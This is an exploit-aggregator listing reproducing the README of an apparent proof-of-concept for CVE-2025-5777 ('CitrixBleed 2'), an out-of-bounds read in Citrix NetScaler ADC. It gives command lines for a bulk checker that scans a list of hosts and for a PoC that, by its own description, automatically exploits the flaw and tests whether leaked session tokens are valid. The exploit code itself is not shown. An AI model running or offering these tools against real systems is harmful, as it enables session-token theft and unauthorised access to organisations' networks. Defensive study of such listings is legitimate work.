Sploitus

Exploit for Out-of-bounds Read in Citrix Netscaler Application Delivery Controller

githubexploit Β· 2025-07-06

Exploit Code

README26 lines
## https://sploitus.com/exploit?id=A34E26FA-0B2C-5ABE-A6A3-AC85A0F36A06
# CitrixBleed-2-CVE-2025-5777

## checker

checker.py http_https_host_:_port.txt result.txt 8

### better you run

OPENSSL_CONF=./openssl.cnf checker.py http_https_host_:_port.txt result.txt 8

## poc

this poc automatic exploit CVE-2025-5777 and check token exsist and after valid or not.

poc.py -u https://target.example.com -v

### better you run

OPENSSL_CONF=./openssl.cnf poc.py -u https://target.example.com -v

## thanks to 

@watchTowr & @sinsinology & @Chocapikk 

 - :)